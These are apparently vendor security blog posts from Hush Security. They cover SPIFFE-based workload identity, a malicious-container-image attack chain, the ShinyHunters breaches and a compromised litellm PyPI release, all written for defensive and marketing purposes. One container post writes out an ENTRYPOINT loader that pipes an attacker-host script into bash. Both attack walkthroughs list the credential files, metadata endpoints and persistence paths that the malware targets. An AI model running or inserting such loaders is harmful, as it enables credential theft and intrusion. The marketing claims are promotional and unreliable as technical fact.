SPIFFE Everywhere: Why the Best Identity Standard Still Hadn’t Took Over, and How Hush Makes It Work

Hush Security Engineering's avatar
Hush Security Engineering Engineering Team

Table of Contents

Three services crashed at 3 AM. The rotation job failed. Your team got paged. Six hours later, you had a working incident report.

Meanwhile, your data pipeline agent extracted customer data for hours before anyone noticed. Your logs show the agent made the queries. You can’t prove it wasn’t an attacker.

Both scenarios share the same root cause: you’re managing credentials like it’s 1995.

Compromised identities account for over 70% of cloud breaches. Stolen credentials are tied to 86% of security breaches. Your API key costs $10 on the criminal market.

You’re not managing credentials. You’re managing a liability.

The Operational Tax of Manual Credential Lifecycle Management

Every 90 days, your team stops shipping features to rotate credentials. Someone writes a rotation job. Someone schedules the maintenance window. Someone stays up late monitoring failures. Someone gets paged when it breaks.

For microservices, rotation failures cascade. For AI agents, they run 24/7 without human intervention – rotate too slow and the agent crashes, rotate too fast and you cause outages.

When credentials leak:

  • Your API key works for 6 months
  • The attacker has unlimited access to everything it touches
  • You won’t notice for ~88 days
  • Breaches caused by compromised credentials cost $4.50M on average
  • The credential itself cost an attacker $10

Your infrastructure is secured by a $10 secret that lives forever.

What SPIFFE Actually Is

SPIFFE = Secure Production Identity Framework For Everyone.

Instead of: “Here’s a secret, rotate it every 90 days.”

SPIFFE says: “I’ll issue you a certificate valid for 1 hour. When it expires, you get a new one automatically. No pre-shared secrets. No rotation jobs.”

Three building blocks:

SPIFFE ID – a unique URI identifying the workload, e.g. spiffe://example.org/ns/production/sa/payment-service. Public identifier, not a secret.

SVID (SPIFFE Verifiable Identity Document) – the credential itself. X.509 cert or JWT. Short-lived. Auto-rotates. Delivered via local API – no manual distribution.

Attestation – cryptographic proof of identity derived from environmental signals (Kubernetes node identity, cloud metadata, container runtime). No pre-shared secrets.

How it works: Workload starts, requests identity, SPIRE server verifies environment, issues a 1-hour certificate, workload uses it, new one issued before expiry.

What SPIFFE Promises

No rotation windows. Certificates rotate hourly. Zero downtime. Zero 3 AM pages.

Breach window shrinks to 60 minutes. If a credential leaks, it’s invalid in an hour – not six months.

No credential distribution. No mounted secrets, no shared API keys – workloads prove identity cryptographically.

Mutual authentication. Service A proves identity to Service B. Both sides verified.

Fine-grained, scoped access. Payment service gets access to the payments DB only. Nothing else.

Scales without operational burden. Your 150th microservice doesn’t need a new rotation job. Same system, zero overhead.

This is the pitch – and it’s a good one. SPIFFE has been the “right answer” for workload identity for nearly a decade.

So why isn’t everyone using it?

The Reason SPIFFE Stalled: The Ecosystem Doesn’t Speak It

Here’s the uncomfortable truth almost no SPIFFE content will tell you: SPIFFE only works where both sides of the conversation support it.

And most of the things your workloads actually talk to – don’t.

  • S3 doesn’t accept SPIFFE SVIDs. It accepts AWS access keys or STS tokens.
  • Snowflake, Postgres, MySQL, MongoDB Atlas – none authenticate SPIFFE identities natively.
  • Stripe, Twilio, OpenAI, Salesforce, GitHub, Datadog, every SaaS API your stack depends on – they want an API key or OAuth token. Not an SVID.
  • Your legacy internal services – the ones written before 2021 – still expect a bearer token or a username/password.

SPIFFE handles east-west traffic beautifully: service-to-service mTLS inside a mesh. But the moment a workload needs to read an S3 bucket, query Snowflake, call Stripe, or hit any of the hundreds of APIs your business runs on – you’re back to static API keys. Back to vaults. Back to 90-day rotation jobs. Back to the $10 forever-credential problem.

This is why most SPIFFE rollouts die mid-implementation. Teams deploy SPIRE, secure 20% of their traffic, and then run headlong into the 80% of external and legacy dependencies that will never support SPIFFE. The rotation pager keeps firing. The vault keeps sprawling. The promise of identity-first security evaporates.

SPIFFE is right. The ecosystem is just too big to rewrite.

The Hush Retrofit: SPIFFE-Grade Identity on Every Resource You Already Have

This is where Hush comes in.

Instead of waiting for S3, Snowflake, Stripe, and your legacy APIs to adopt SPIFFE (they won’t), Hush uses SPIFFE/SPIRE as the attestation layer – and brokers access to everything else.

The flow:

  1. A policy is created with the Hush solution. Workload identity (pod, machine, process), target service/resource (Snowflake, Cloud federated resources) and role or permissions (READ Users Table, View Role on OpenAI)
  2. Workload starts. No embedded credentials. No long lived keys.
  3. Hush validates the SPIFFE identity, checks policy, and issues a fresh, short-lived, scoped “legacy” credential – an AWS STS token, a database password, a rotating API key – whatever that resource actually accepts.
  4. The workload does its job.
  5. Hush revokes the credential when the task completes,  no long-lived secrets left lying around.

Same cryptographic identity guarantees as SPIFFE. Same short lifetimes. Same scoped access. But it works on the resources you already run – without asking AWS, Snowflake, Stripe, or your own legacy services to change a single line of code, without waiting for the entire aco-system to adapt to the new standard.

SPIFFE attests. Hush brokers. The ecosystem just works.

Real-World Scenario: Microservices at Scale

You run 150 microservices across multiple clusters. Each one needs database access, third-party APIs, cross-service communication, and S3.

Without Hush: Pure SPIFFE gets you mutual TLS between services. Good. But your payment service still holds a 6-month Postgres password to access the payments DB, a long-lived Stripe key, and an AWS access key for S3. Rotation jobs, vault entries, and 3 AM pages remain.

With Hush: The payment service is attested by SPIRE at startup. When it needs the payments DB, Hush issues a Postgres credential scoped to the payments schema. When it needs Stripe, Hush issues a short-lived Stripe key scoped to the operations this service is authorized for. When it needs S3, Hush brokers an STS token scoped to the one bucket. Every credential is bound to the attested SPIFFE identity, every credential is short-lived, every credential is revoked when the work is done. The audit trail is cryptographically signed end-to-end – you can prove to regulators exactly which service made each access.

No rotation jobs. No vault. No 3 AM pages. No changes to Postgres, Stripe, or S3.

Real-World Scenario: AI Agents

Your data pipeline agent accesses: the customer database (read), the data warehouse (write to specific schemas), S3 buckets (output), transformation APIs.

Without Hush: The agent runs on one long-lived API key with full permissions to everything. An attacker gets it, extracts millions of records overnight, and your logs can’t distinguish the attacker from the agent.

With Hush: The agent is attested via SPIFFE/SPIRE at startup. Before each operation, it requests scoped, short-lived credentials from Hush – a read token for a specific customer table, a write token for a specific warehouse schema, an STS token for a specific output bucket, an API key scoped to specific transformation endpoints. Each credential is revoked when the task completes. A stolen credential buys the attacker a tiny window on a tiny slice of the system – and you can prove which requests were legitimate vs. anomalous.

The agent’s real identity is the SPIFFE attestation. The “legacy” keys are disposable.

Why This Matters Now

Credentials leaked 160% more in 2025 than in 2024. Your team probably hasn’t rotated this quarter. 70% of cloud breaches start with compromised identities. 86% of web application attacks involve stolen credentials. That $10 credential could be yours.

For microservices: Kubernetes adoption is standard. Thousands of services per org is routine. Manual secret management at this scale is a losing game.

For AI agents: Autonomous workloads are exploding. Data pipelines, ML training agents, ETL orchestrators, inference engines – every one of them needs identity. Today they mostly run on static API keys that never expire.

SPIFFE solved the identity problem years ago. The ecosystem just hadn’t caught up. Hush closes the gap.

SPIFFE as a Service : Without the Ecosystem Problem

Building SPIRE yourself takes months: highly available servers, agents on every node, certificate pipelines, multi-cloud federation, ongoing maintenance. And even after all of that, you still can’t talk to your databases or SaaSs without static keys.

Hush delivers the full stack as a managed service:

  • Managed SPIRE – workloads get cryptographic identity automatically on startup. No infrastructure to build.
  • Credential brokering – short-lived, scoped credentials for AWS, Snowflake, Postgres, every major SaaS, and your internal legacy services. Issued on demand, bound to SPIFFE identity, revoked when the task is done.
  • Unified policy – one place to say “the payment service can access these resources, scoped this way, for this long.” No more per-system ACL sprawl.
  • No code changes on the resource side. S3, Snowflake, Stripe, your legacy APIs – untouched.

For microservices: integrate via existing service mesh or sidecar.

For AI agents: a single Hush call, then on-demand credential requests as the agent works.

Your team focuses on shipping microservices and building better agents. Not managing credentials.

Getting Started

Pick one critical service or one autonomous agent. Replace its long-lived credentials with Hush-brokered, SPIFFE-attested, short-lived ones. Within weeks, you stop thinking about rotation for that workload. Within months, you wonder why you ever managed credentials any other way.

Start small. Expand as the wins compound. Stop rotating. Stop managing vaults. Stop losing engineering time to credential management.

Ready to Make SPIFFE Work Everywhere?

For platform, SRE, data, and ML engineering teams: See how Hush combines SPIFFE-grade attestation with short-lived, scoped credentials for every resource your workloads already depend on – without changing the resources themselves.

Still Using Secrets?

Let's Fix That.

Get a Demo

Malicious Container Images: Runtime Container Secret Detection When Static Scanning Fails

Micha Rave's avatar
Micha Rave CEO and Co-Founder

Table of Contents

Your organization has been using the same Python 3.11 base image for six months. It passed all static security scanning when you pulled it. Your supply chain policy flagged no violations. Automated vulnerability checks found nothing. Yesterday, when one of your containers started in production, the ENTRYPOINT script executed a single line: curl https://attacker-controlled-server.com/payload.sh | bash. By the time that command returned, the container had exfiltrated every SSH key on the host, dumped AWS credentials from the instance metadata endpoint, and attempted to compromise the Kubernetes cluster. The malware was never in the image. Your scanner never saw it. It arrived in code that only executed at runtime.

This attack pattern is no longer theoretical. It is happening at scale across Docker Hub and private registries worldwide. And the uncomfortable truth is that your existing container security tooling is not designed to catch it.

How The Container Credential Leakage Attack Works

The malicious container image attack exploits a fundamental asymmetry in how container security works: static analysis scans images at rest. Malicious payloads execute at runtime. There is a gap between these two moments, and attackers have learned to hide in it.

Here is the attack chain in detail.

Stage 1: The Malicious Image

An attacker creates a Docker image that looks legitimate. It might be a typosquatted version of a popular base image (ubunto:20.04 instead of ubuntu:20.04), or it might be a straightforward image with a misleading name like python-slim or golang-runtime designed to suggest it is an official image even though it is not. The image includes all the normal components you would expect: OS packages, runtimes, development tools.

But the ENTRYPOINT or CMD instruction contains a tiny bootstrap script. Not the malicious payload itself. Just a loader.

ENTRYPOINT ["/bin/sh", "-c", "curl https://attacker.com/init.sh | bash && exec \"$@\""]

This script is small enough to pass visual inspection. It looks like a normal entrypoint wrapper. When the image is built and layers are committed, the script sits in the top layer alongside legitimate files. When the image is pushed to a registry and scanned, the script is visible but appears benign. It is just a curl command. Nothing unusual about that.

The actual malware — the code that harvests credentials and exfiltrates data — is not in the image. It lives on the attacker’s server. It only lands on the target machine when the container starts and that curl command executes.

Stage 2: Registry Distribution

The image gets pushed to Docker Hub, or it gets mirrored into your organization’s private container registry. In the public case, it starts accumulating pulls. A typosquatted image can get millions of downloads because developers typing fast or working in low-attention contexts will grab the wrong name. In the private case, a developer pulls what they think is a legitimate base image and uses it for their Dockerfile.

Your image scanning tools analyze the image layers. They check every dependency, every package, every binary against vulnerability databases. The scanner looks for known CVEs, license violations, and malicious components. The ENTRYPOINT curl command might be flagged as a shell injection risk. But it is a common pattern in production Docker images. It is not enough to block the image. The image passes policy. It is added to the repository.

Stage 3: Container Deployment

Your team, or hundreds of teams across your organization, use the image as a base:

FROM ubunto:20.04

RUN apt-get update && apt-get install -y ca-certificates curl

COPY app /app

WORKDIR /app

CMD ["python", "app.py"]

Static scanning on your build pipeline sees a clean base image. Dependency checks pass. The image is promoted to production. Thousands of containers spawn from it across your cluster.

Stage 4: Runtime Execution and Credential Harvesting

The container starts. The ENTRYPOINT executes. The curl command fires. It downloads a shell script from the attacker’s server, pipes it to bash, and executes it in the container’s process space with the container’s identity and filesystem access.

What happens next depends on the attacker’s payload. In the documented cases, the pattern is consistent:

Credential Harvesting: The script spawns a background process that crawls the filesystem for everything a cloud attacker wants. SSH private keys in ~/.ssh/. AWS credentials in ~/.aws/credentials and instance metadata endpoints at http://169.254.169.254. GCP ADC tokens at ~/.config/gcloud/. Azure CLI configs at ~/.azure/. Kubernetes service account tokens at /var/run/secrets/kubernetes.io/serviceaccount/token. Environment variables that might contain API keys. Git configurations with embedded credentials. Bash history showing commands that exposed secrets.

Data Exfiltration: The harvested material is encrypted with a session key, that key is wrapped in the attacker’s RSA public key, and the whole bundle is POSTed to a server controlled by the attacker. Only they have the private key. Even if the traffic is intercepted, the data is unreadable.

Lateral Movement: If the container is running in Kubernetes with a service account that has cluster-admin or overly permissive permissions, the malware uses the token to enumerate secrets across all namespaces, dump them, and attempt to schedule privileged pods on other nodes.

The container appears to function normally. Your monitoring shows CPU and memory usage as expected. The application logs show no errors. The attack is silent.

Secrets Leakage Container Attack

Here is what the attack looks like when traditional container security fails to catch it:

Figure 1: The Attack Uncaught. Credentials are harvested and exfiltrated to attacker infrastructure. Static image scanning, SCA tools, and network monitoring all miss the attack because the malicious payload executes at runtime, not in image layers.

Why Your Existing Container Security Tools Miss This

Your security stack includes several layers of defense, each one assumed to catch supply chain attacks. None of them are designed for this specific threat.

Container Image Scanning looks at the image layers before they run. It performs deep, recursive analysis of every component. It checks against CVE databases, malicious package feeds, and license compliance policies. But it is analyzing a static artifact — a tarball of files on disk. The malicious binary is not in that tarball. It is on the attacker’s server. The script that will fetch it is visible, but the script itself is not malicious code. It is a downloader. Static scanners cannot analyze what the curl command will return. They cannot execute the script in a sandbox and observe its behavior. They can flag the risky pattern (shell pipe to bash) but that pattern is too common in production images to block outright. The image passes.

Vulnerability scanning in your CI/CD pipeline works the same way. It runs on images before they are deployed. It checks dependencies. It finds nothing wrong.

Network egress controls might catch the exfiltration attempt, if you have strict allowlisting in place. Most organizations do not. Developer laptops almost never do. And even in production, the domain the malware connects to is often designed to blend in. update-service.cloudcdn.com or metrics-relay.internal.io. It looks legitimate in logs. Or it can even send data to benign known locations, like GitHub, effectively exfiltrating via git commits.

Kubernetes network policies do not run on the container before it starts. By the time the policy engine is evaluating traffic, the curl command has already executed and the exfiltration has begun.

Runtime container controls (seccomp profiles, AppArmor, read-only root filesystems) can slow down the attack, but they rarely stop it. A well-crafted payload works around them. And more importantly, most organizations have not deployed these controls at scale because they require deep knowledge of what each container actually needs to do.

The root cause is that all of these tools assume the code running inside the container at startup is trustworthy. They assume that if the image passed scanning, the image is safe. Supply chain attacks invalidate that assumption. An image that was legitimately scanned can become malicious at the moment it executes, if that execution includes downloading and running arbitrary code from the internet.

The Structural Problem: Static Secret Scanning vs Runtime Execution

The attack works because of a mismatch in the container security model. Images are scanned as static artifacts. Execution is a runtime process. Code does not need to exist in the image to run inside the container.

This is actually a feature. Many container images intentionally download and compile code at startup. They do this for good reasons: smaller image sizes, dynamic version selection, runtime configuration. But the same mechanism enables malicious payloads.

The response from defenders is usually to add more static controls. Scan earlier. Scan more aggressively. Use allowlists of approved registries. Check image signatures. None of these stop an attacker who has registered a typosquatted image on Docker Hub and signed it legitimately, or who has compromised a supply chain and injected the bootstrap script into an official image before it is signed.

The uncomfortable truth is that as long as your container security model is built on scanning static artifacts, you are vulnerable to attacks that fetch and execute code at runtime. Rotation and incident response are your primary tools. You will detect the attack by finding exfiltrated data in your cloud logs. Then you will rotate credentials, patch images, and rebuild containers.

Runtime Detection: The Different Security Model

At Hush, we build on a different premise: the runtime behavior is the security boundary. Credentials should not be files that any process can read. Access should not be gated by possession of secrets. And execution should be monitored and controlled by policy, not just by static image analysis.

Here is what that means in practice for this attack:

No Static Credentials to Harvest: When containers access AWS, GCP, Azure, databases, or APIs through Hush, they do not receive long-lived credentials to store on disk or in environment variables. They request short-lived, dynamically issued tokens scoped to exactly the permissions the current workload requires. There is no ~/.aws/credentials for the malware to find. No Kubernetes ClusterAdmin token sitting in a service account. No hardcoded database password in a ConfigMap. A credential harvester returns empty-handed because the credentials do not exist in the form it is looking for. If static credentials are mandatory, Hush makes sure to automatically rotate and revoke keys, voiding the exfiltration attempt shortly after.

eBPF-Based Non Human Identity Anomaly Detection: Hush’s sensor observes system calls at runtime without kernel modification or agent overhead. It tracks which processes open which files, which network connections they initiate, and which identities (credentials, API tokens, connection strings) are behind each action. In this attack, the sensor would observe the exact moment when the malicious behavior begins and alert before exfiltration completes.

Scoped, Time-Limited Access to Kubernetes: If the container is running in Kubernetes, the service account token it receives through Hush is scoped to the minimum permissions the workload actually needs and expires after a short TTL. A token that allows a pod to read its own namespace’s ConfigMaps cannot be used to enumerate cluster secrets or schedule pods. The API calls the malware makes return 403 (Forbidden). The attempt is logged.

Coordinated Remediation: When Hush detects malicious runtime behavior in a container, we immediately trace that container back to the source image. We identify all downstream consumers of that image across your deployments. The initial attack detection is not the end of the incident response. It is the start of a coordinated remediation that reaches every affected container in your organization.

Detect and Protect Secret Leakage at Container Runtime

Here is the same attack when Hush runtime monitoring is in place:

Figure 2: Attack Detected by Hush. Attack is detected and blocked before credentials are exfiltrated. Multi-stage runtime anomaly detection (1. unexpected process spawn, 2. credential file access, 3. unauthorized network egress) fires on attack initiation. Malicious image is identified and quarantined automatically.

Real-World Attack: Malicious Container Images on Docker Hub

The attack we have outlined is not theoretical. This pattern has been documented across hundreds of malicious images in public registries in recent campaigns.

Security researchers have discovered malicious container images on Docker Hub that use typosquatting to mimic legitimate base images. These images executed Python scripts at startup that downloaded cryptocurrency miners. The scripts appeared benign on the surface. The miners were compressed and embedded in ways that signature-based scanners missed. Popular images with misleading titles like azurenql accumulated over a million downloads before detection.

The most effective attacks follow a consistent pattern: they include only a tiny bootstrap script in the image layers. The heavy payload — the actual miner or credential stealer — is fetched and executed at runtime. Until the image runs, the compiled binary does not exist anywhere a static scanner can find it.

Campaigns using images with names like openjdk and golang were particularly sophisticated. The images had misleading titles designed to trick developers into thinking they were official releases. When run, they downloaded and compiled miners, then used the container’s resources for cryptocurrency mining. The attacks remained undetected for months because the mining process was small and quiet, and the bootstrap script looked like normal container initialization.

Defense Strategy: Beyond Static Image Scanning

If you pull base images from Docker Hub or other public registries, treat your supply chain as under active threat. The specific defenses:

Verify image provenance using digests: Do not pull images by name alone. Use image digests (the SHA256 hash of the image manifest). Verify the digest against the official source (the publisher’s GitHub, their documentation, or a signed checksum). If the image name has changed hands or the publisher account has been compromised, the digest will not match what you expect.

# Vulnerable: pulling by tag
docker pull ubuntu:20.04

# More secure: pulling by digest
docker pull ubuntu@sha256:12345abcde...

Implement image signing and verification: Use Cosign or similar tools to cryptographically verify that images have been signed by the publisher you expect. This does not prevent typosquatting (an attacker can sign their own images), but it does ensure you are getting what the publisher actually released.

Use private registries with gating policies: If you use a container registry, implement a policy that requires all images to pass security scanning before they are available to deployments. But understand that this catches known vulnerabilities, not novel runtime attacks.

Deploy runtime behavioral monitoring: This is where Hush comes in. Runtime behavioral monitoring can detect when a container does something it should not do, whether that is spawning an unexpected process, opening credential files, or making network connections to unauthorized domains. This catches attacks that static scanning cannot.

Audit and rotate credentials regularly: If credentials are present in your environment as static files or environment variables, assume they have been compromised if a malicious image has run in your infrastructure. Rotate all of them: SSH keys, cloud provider credentials, database passwords, API keys, and Kubernetes service account tokens. Use a solution that provides identity-based access, rather than file or env-based, and one that orchestrates automatic, timely rotation to minimize breach impact — don’t wait for a breach to happen or for “that time in the year”.

Beyond Static Checks: The Future Of Container And Secrets Security, From Code To Cloud

The attack on container base images puts a question to every engineering team: What would your organization’s security posture look like if a malicious image ran in your infrastructure for a week without crashing or raising alarms?

If the answer is that you would not know it happened until you discovered exfiltrated data in your cloud logs, or noticed cryptocurrency mining draining your cloud resources, or found lateral movement in your Kubernetes audit logs, that is a signal that your security model is too dependent on static checks and incident response.

We built Hush to make that question less frightening. By moving the security boundary from image artifacts to runtime behavior, by issuing credentials dynamically rather than storing them, and by monitoring for anomalies rather than waiting for post-incident forensics, we change the equation. The malicious payload can fetch whatever it wants. It still cannot exfiltrate credentials that do not exist. It still cannot move laterally with tokens that do not grant the permissions it needs. And it will be caught before it completes.

If you want to see what shift-left access, eliminating static credentials and implementing runtime detection looks like for your container infrastructure, we are happy to walk you through it.

Hush Security delivers a unified access and governance platform for AI and non-human identities, replacing secrets with verified identities and dynamic, just-in-time access policies.

The next malicious base image will pass your scanner. Hush makes sure it still can’t do anything with what it finds.

Let’s Fix That. Get a Demo

Still Using Secrets?

Let's Fix That.

Get a Demo

Don’t Be the Next ShinyHunters Breach

Chen Nisnkorn's avatar
Chen Nisnkorn CCO and Co-Founder

Table of Contents

Stop rotating. Start solving – credentials that never exist as static artifacts can’t be stolen.

For the CISO: Forward this to your infra team. The solution is three YAML files.

For the infra team: This is how you eliminate the entire class of credential-leak breaches – for every service in your stack.

ShinyHunters breached Anodot. Anodot had tokens connecting it to Rockstar’s Snowflake. You know the rest. Many postmortems from the last 18 months end the same way: “Rotate all potentially exposed secrets.”

Snowflake, OpenAI, Postgres, Redis, Elasticsearch… they all hand out keys by default. Those keys will end up somewhere they shouldn’t. In a JFrog artifact. Cleartext in a git commit. An S3 config file. A Kubernetes ConfigMap. And eventually, they’ll be found.

Managing NHI credentials is not a GTA-play. Fixing it time after time is not solving it. The solution is removing the key entirely.

Who is ShinyHunters?

ShinyHunters is a prolific cybercrime group responsible for some of the largest data breaches of the last five years – AT&T, Ticketmaster, Santander, and dozens more. Their method is rarely sophisticated: find a credential left somewhere it shouldn’t be, use it.

Rockstar statement in full follows from last week:

The Real Problem, It’s Not Just One Thing

Problem #1: Every Service Speaks a Different Auth Language

This is why it’s so hard to solve. It’s not just that services hand out long-lived credentials – it’s that they all hand out different kinds:

Category Services Auth Method
AI / LLM providers OpenAI, Anthropic, Grok, Vertex AI, Bedrock API key, IAM role, service account
Databases PostgreSQL, MySQL, MariaDB, MongoDB, Snowflake, Redis Password, connection string, key pair, x.509 cert
Search & analytics Elasticsearch, OpenSearch, Datadog API key, username/password, service token
Messaging & brokers Kafka, RabbitMQ SASL username/password, SCRAM, mTLS, OAuth
Cloud & infra AWS, GCP, Azure, Kubernetes IAM role, managed identity, service account token
SaaS & business apps GitHub, Slack, Jira, Confluence API token, OAuth, PAT

The fragmentation means you can’t enforce one consistent policy across your stack. Every service is its own island. You can’t adopt one rotation policy across API keys, connection strings, x.509 certs, and IAM roles, and you can’t realistically audit whether every vendor holding every credential type has rotated on schedule.

Problem #2: Someone Will Always Cut a Corner

No policy survives contact with a deadline. There will always be a DevOps engineer, a developer, an architect moving fast, and they’ll store that credential somewhere it shouldn’t be (I’ve done it myself. We all have.). In a JFrog artifact. Cleartext in a git commit. An S3 config file. A Kubernetes ConfigMap. Not because they’re careless. Because the current model requires them to handle credentials in the first place.

You can write all the policies you want. You cannot stop a human from doing what humans do under pressure.

Therefore, the solution cannot be implemented within the authentication model of each individual service. Instead, it must operate as a unified governance layer, enforcing a single, consistent access control policy regardless of whether the underlying service relies on an API key, a password, a certificate, or a token. This architecture must also inherently eliminate the risk of credential exposure, as no user ever interacts with them directly.

What You Can Actually Do Today (And It’s Simpler Than You Think)

Imagine setting access to Snowflake, OpenAI, Redis, Elasticsearch, PostgreSQL, Datadog…, JIT, scoped to the exact workload that needs it, with full cryptographic attestation, and never having a credential sitting anywhere to steal.

That’s what Hush Security does. It’s SPIFFE-native out of the box.

Every workload gets a SPIFFE identity, a cryptographically verified ID tied to its runtime environment (Kubernetes namespace, service account, node). When the workload needs access to Snowflake, it doesn’t look up a stored password. It presents its SPIFFE identity, Hush verifies it, and issues a short-lived scoped credential directly to the workload at runtime. The credential expires. Nothing is stored. Nothing can end up in a git commit, a JFrog artifact, a ConfigMap, or an S3 file, because it never existed as a static thing.

Developers never touch the credential. There’s nothing to misplace. No more “rotate your secrets.” There’s nothing to rotate.

The Setup: Three YAML Files

Define the connector (what to connect to: OpenAI, Anthropic, Grok, Vertex AI, Bedrock, PostgreSQL, MySQL, MariaDB, MongoDB, Snowflake, Redis, Elasticsearch, OpenSearch, Datadog, Kafka, RabbitMQ, AWS, GCP, Azure, Kubernetes), the privilege (what access it gets), and the policy (which workload identity receives it). That’s it.

1. connector.yaml - the connection (snowflake as example):

apiVersion: am.hush.security/v1alpha1
kind: AccessCredential
metadata:
  name: demo-snowflake
  namespace: hush-security
spec:
  type: snowflake
  config:
    account: <ORG-ID>-<ACCOUNT-ID>
    warehouse: COMPUTE_WH
    database: DB
    schema: PUBLIC
    username: user_analytics
    auth_method: key-pair
  secretRef:
    name: demo-snowflake-secret
  keyMappings:
    private_key: snowflake-private-key

2. access-privilege.yaml - minimum access only:

apiVersion: am.hush.security/v1alpha1
kind: AccessPrivilege
metadata:
  name: snowflake-readonly
  namespace: hush-security
spec:
  type: snowflake
  config:
    grants:
      - privileges: [SELECT]
        resource_type: table
      - privileges: [USAGE]
        resource_type: warehouse

3. access-policy.yaml - which workload gets it, verified by SPIFFE:

apiVersion: am.hush.security/v1alpha1
kind: AccessPolicy
metadata:
  name: analytics-snowflake-access
  namespace: hush-security
spec:
  enabled: true
  accessCredentialRef:
    name: demo-snowflake
  accessPrivilegeRefs:
    - name: snowflake-readonly
  attestationCriteria:
    - type: "k8s:ns" # SPIFFE attestation - only this workload
      value: analytics
  deliveryConfig:
    type: env # injected at runtime, never stored
    config:
      items:
        - { name: SNOWFLAKE_USERNAME, key: username, type: key }
        - { name: SNOWFLAKE_PRIVATE_KEY, key: private_key, type: key }
        - { name: SNOWFLAKE_ROLE, key: role, type: key }

The attestationCriteria is the key part. Hush verifies the workload’s SPIFFE identity before issuing anything. Only workloads in the analytics namespace get these credentials – not a developer’s laptop, not a CI pipeline, not a third-party vendor’s misconfigured environment. The credential arrives at runtime, lives for the duration of the job, and disappears.

Same pattern works for every service in your stack. Repeat for OpenAI, Redis, Elasticsearch, Datadog, MySQL, MongoDB.

What This Means in Practice

Before After
Static key stored in vendor’s config No key stored anywhere
Developer creates + manages credentials Declare a policy, Hush handles the rest
“Rotate after breach” Nothing to rotate – credential never persisted
Third-party breach = your data at risk Third-party breach = attacker finds nothing
Someone always cuts a corner under pressure No one can – because no one ever holds a credential
Keys leak into git, JFrog artifacts, S3, ConfigMaps Credential is provisioned and delivered just-in-time, exclusively to the intended workload

Anodot gets breached. Attacker searches for Snowflake credentials. Finds nothing – because the credential was issued for that run, verified against a SPIFFE identity, scoped to SELECT only, and expired before the breach happened.

Snowflake, OpenAI, Postgres, Datadog, Redis, Elasticsearch – unstealable.

Not because they’re stored better. Because they were never stored.

Sources: ShinyHunters / Anodot / Rockstar – HackRead · Techcrunch, hackread

Still Using Secrets?

Let's Fix That.

Get a Demo

Your Dependency Tree is Your Attack Surface

Hush Security Engineering's avatar
Hush Security Engineering Engineering Team

Table of Contents

Last week, a malicious package sat on PyPI for less than an hour. It was pulled in by millions of projects as a transitive dependency. It silently harvested every secret on every machine that installed it, encrypted the haul with a hardcoded RSA key, and shipped it to an attacker-controlled server. Then it tried to pivot into Kubernetes, plant a persistent backdoor, and spread across every node in the cluster.

The package was litellm 1.82.8. The attacker didn’t compromise a cloud provider or exploit a zero-day. They uploaded a Python package. That was enough.

We want to walk through exactly how this worked, why the standard toolkit failed to stop it, and what a different security model looks like in practice.

How the attack worked

The compromised litellm 1.82.8 release (and 1.82.7, which was also affected) included a file called litellm_init.pth. Python’s site module processes .pth files automatically on every interpreter startup, before any application code runs, with no import statement required. Dropping a .pth file into a package is one of the most reliable code execution primitives available to a PyPI attacker: silent, automatic, and almost never audited.

Figure 1: The three-stage attack chain, from PyPI upload through direct and transitive installs to credential harvest, exfiltration, and Kubernetes persistence.

The payload ran in three stages:

Stage 1: Harvest. A Python script crawled the filesystem for everything a cloud attacker would want: SSH private keys and config files, .env files, cloud provider credentials ( ~/.aws/credentials, GCP Application Default Credentials at ~/.config/gcloud/, Azure CLI tokens at ~/.azure/), Kubernetes configs at ~/.kube/config, .gitconfig, shell history, and anything matching common secret filename patterns. It also hit cloud metadata endpoints directly: the AWS IMDS at http://169.254.169.254, GCP metadata at http://metadata.google.internal, and container credential endpoints, to capture ephemeral tokens that would never appear on disk.

Stage 2: Exfiltrate. The collected data was encrypted with a random AES-256-CBC session key. That session key was then wrapped with a hardcoded 4096-bit RSA public key, bundled into a tar archive, and POSTed to https://models.litellm.cloud/, a domain crafted to pass a casual glance as legitimate litellm infrastructure. Only the attacker held the RSA private key, so the payload was unreadable in transit to anyone else.

Stage 3: Persist and spread. If a Kubernetes service account token existed at /var/run/secrets/kubernetes.io/serviceaccount/token, the malware used the Kubernetes API to enumerate and exfiltrate all cluster secrets across all namespaces, then attempted to schedule a privileged alpine:latest pod on every node in kube-system. Each pod mounted the host filesystem at /host and wrote a persistent backdoor to ~/.config/sysmon/sysmon.py, registered as a systemd user service at ~/.config/systemd/user/sysmon.service. The same persistence routine ran on the local machine regardless of whether Kubernetes was present.

The blast radius extended far beyond anyone who explicitly ran pip install litellm. Any package declaring litellm>=1.64.0 as a dependency pulled in the compromised version automatically, including widely used AI frameworks. LiteLLM sees roughly 97 million monthly PyPI downloads. Most victims would have had no idea they were affected.

The attack was discovered by accident. The .pth launcher spawned a child Python process via subprocess.Popen. Because .pth files execute on every interpreter startup, that child immediately triggered the same .pth again, producing an exponential fork bomb. A developer at FutureSearch noticed their machine running out of RAM after an MCP plugin pulled in litellm 1.82.8 as a transitive dependency inside Cursor. A competent attacker would not have made that mistake. The window of exposure would have been measured in days or weeks, not hours.

Why your existing tools would not have caught this

Before getting to what Hush does, it is worth being specific about why the standard security stack fails against this class of attack.

Software composition analysis (SCA) and dependency scanning check known vulnerability databases. This was not a vulnerability. The package was legitimate code doing exactly what it claimed. No CVE was ever filed. An SCA scanner pointed at your lockfile after the fact would have found nothing.

Secret scanning looks for secrets committed to source control or present in CI logs. The secrets in this attack lived on developer workstations and in running service environments, not in git. Secret scanning would not have seen them.

Network egress controls might have caught the exfiltration POST to models.litellm.cloud, if you had strict allowlisting in place. Most environments do not. Developer laptops almost never do. And the domain was designed to blend in.

Vault and secrets management tools like HashiCorp Vault or AWS Secrets Manager reduce secret sprawl when used correctly, but they still issue secrets that land somewhere: in environment variables, in files, in memory accessible to any process running as the same user. A malicious package running in the same process space or as the same OS user can reach them.

The uncomfortable truth is that all of these controls are perimeter defenses. They assume the code running on your machines is trustworthy. Supply chain attacks invalidate that assumption at the root.

The structural problem: secrets are just files

It is tempting to frame yesterday’s attack as a PyPI moderation failure, or a litellm maintainer incident. Both of those things are true and worth fixing. But they do not explain why the attack was so effective or why rotating credentials after the fact is the best available response.

Every credential that was exfiltrated (AWS access keys, GCP ADC tokens, Kubernetes configs, SSH keys, .env API keys) shared one property: it was a long-lived, static secret sitting on disk. Secrets do not authenticate their reader. They do not know whether the process opening ~/.aws/credentials is your application or malware that arrived as a transitive dependency of a package you installed this morning. Possession is the entire security model.

